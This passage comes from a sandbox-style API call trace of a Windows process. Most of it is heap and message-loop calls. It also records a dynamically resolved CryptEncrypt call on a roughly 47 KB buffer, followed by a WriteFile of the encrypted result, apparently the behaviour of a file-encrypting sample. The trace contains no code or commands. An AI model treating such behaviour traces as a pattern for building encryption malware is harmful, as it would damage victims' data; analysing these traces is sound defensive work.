hHeap=0x2af0000) returned 1 [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0214.848] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0214.848] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.849] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854e48 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0214.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0214.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0214.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0214.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0214.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0214.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0214.850] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0214.850] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0214.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0214.851] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aba398 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0214.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab6e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.857] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xbb15, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xbb18) returned 1 [0214.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.857] CharLowerBuffW (in: lpsz="byte[47896]", cchLength=0xb | out: lpsz="byte[47896]") returned 0xb [0214.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.858] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.858] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab518, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.858] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2aba398*, pdwDataLen=0x8cef60*=0xbb15, dwBufLen=0xbb18 | out: pbData=0x2aba398*, pdwDataLen=0x8cef60*=0xbb18) returned 1 [0214.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.864] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.864] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.864] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.864] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.864] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.864] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.864] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.864] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.864] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.865] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.865] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.865] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.865] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.865] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.865] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.871] WriteFile (in: hFile=0x504, lpBuffer=0x2a95c58*, nNumberOfBytesToWrite=0xbb18, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a95c58*, lpNumberOfBytesWritten=0x8cf5e4*=0xbb18, lpOverlapped=0x0) returned 1 [0214.872] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.873] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0214.873] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.873] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0214.873] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.873] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.873] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.873] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.873] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | 